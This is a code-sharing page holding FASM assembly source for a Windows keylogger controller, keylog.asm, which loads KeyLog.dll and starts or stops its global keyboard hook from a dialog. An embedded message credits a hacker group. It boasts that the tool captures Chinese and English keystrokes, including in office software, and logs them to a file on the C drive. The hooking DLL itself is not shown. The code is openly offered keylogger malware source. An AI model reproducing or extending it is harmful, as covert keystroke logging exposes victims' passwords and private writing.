📄 keylog.asm

📁 一个比较完美的键盘记录插件看了就知道了

💻 ASM

字号:

format PE GUI 4.0

include 'win32ax.inc'

entry	__start



section '.data' data readable writeable

    hInstance		rd	1
    hDllInst		rd	1
    lpStartHook		rd	1
    lpStopHook		rd	1
    szStartHookName	db	'StartHook',0
    szStopHookName	db	'StopHook',0
    szDllPath		db	'KeyLog.dll',0
    szFaild		db	'KeyLog.dll加载失败，请检查是否在此程序目录下', 0
    szMemo		db	'欢迎来到黑客防线!~~~~~~~此款键盘记录目前测试可以完美截获中文英文，且'
			db	'完美截获word等办公软件，不重复记录等等。由于是用于学习研究，所以此'
			db	'版开放源代码供大家学习，作者:小鱼,from: 晓风组织 (x.f.n.s.t) ..',0d,0ah
			db	'程序默认会在c盘创建key.log文件，此文件为记录信息.....'
    szHookInfo		db	'装载钩子成功，目前可成功截取，您可以退出此程序，不过在您不需要的时候请点击卸载钩子',0
    szUnHookInfo	db	'卸载钩子成功，目前可退出程序...',0

section '.text' code readable executable

    
    
    
    
    proc DlgProc hWnd:DWORD, uMsg:DWORD, wParam:DWORD, lParam:DWORD
    
	    pushad
	    
	    cmp		[uMsg], WM_CLOSE
	    
	    je		DlgEnd
	    
	    cmp		[uMsg], WM_INITDIALOG
	    
	    je		DlgInit
	    
	    cmp		[uMsg], WM_COMMAND
	    
	    je		DlgCommand
    
	RetFalse:
	    
	    popad
	    
	    return	FALSE
    
	DlgInit:
    
	    invoke	LoadLibrary, szDllPath
	    
	    or		eax, eax
	    
	    jne		@f
	    
	    invoke	MessageBox, NULL, szFaild, '提示', MB_OK
	    
	    jmp		RetTrue
	    
	@@:
	
	    mov		[hDllInst], eax

	    invoke	GetProcAddress, eax, szStartHookName
	    
	    or		eax, eax
	    
	    je		LoadFaild
	    
	    mov		[lpStartHook], eax
	    
	    invoke	GetProcAddress, [hDllInst], szStopHookName
	    
	    or		eax, eax
	    
	    je		LoadFaild
	    
	    mov		[lpStopHook], eax
	    
	    invoke	GetDlgItem, [hWnd], 1002
	    
	    invoke	SetFocus, eax
	    
	    invoke	SendDlgItemMessage, [hWnd], 1002, EM_REPLACESEL, 0, szMemo
	    
	    jmp		RetFalse
	
	
	
	LoadFaild:
	
	    invoke	MessageBox, NULL, '获取函数失败....', '提示', MB_OK
	    
	    jmp		RetTrue
    
	DlgCommand:
	
	    mov		eax, [wParam]
	    
	    cmp		ax, 1000
	    
	    je		DlgSet
	    
	    cmp		ax, 1001
	    
	    je		DlgUnSet
	    
	    jmp		RetTrue
	    
	DlgSet:
	
	    call	[lpStartHook]
	    
	    invoke	SendDlgItemMessage, [hWnd], 1002, WM_SETTEXT, 0, szHookInfo
	    
	    jmp		RetTrue
    
	DlgUnSet:
	
	    call	[lpStopHook]
	    
	    invoke	SendDlgItemMessage, [hWnd], 1002, WM_SETTEXT, 0, szUnHookInfo
	    
	    jmp		RetTrue
	    
    
	DlgEnd:
	
	    invoke	FreeLibrary, [hDllInst]
	
	    invoke	EndDialog, [hWnd], 0
	    
	RetTrue:
	    
	    popad
	    
	    return	TRUE
		
    
    endp
    
    
    
    __start:
    
	    call	$+5
	    
	    pop		eax
	    
	    xor		ax, ax
	    
	    mov		[hInstance], eax
	    
	    invoke	DialogBoxParam, eax, 101, NULL, DlgProc, NULL
	    
	    invoke	ExitProcess, NULL
	    

section '.idata' data readable writeable import


	    library	kernel32, 'kernel32.dll',\
			user32, 'user32.dll'
			
	    include	'api\kernel32.inc'
	    
	    include	'api\user32.inc'

	    
section '.rsrc' data readable resource from 'KeyLog.res'

💿 文件大小 6 K

👤 上传用户 a1a1J0

📂 所属分类汇编语言

🏷️ 相关标签

#比较 #插件 #美的 #键盘

⌨️ 快捷键说明

复制代码 Ctrl + C

搜索代码 Ctrl + F

全屏模式 F11

切换主题 Ctrl + Shift + D

显示快捷键 ?

增大字号 Ctrl + =

减小字号 Ctrl + -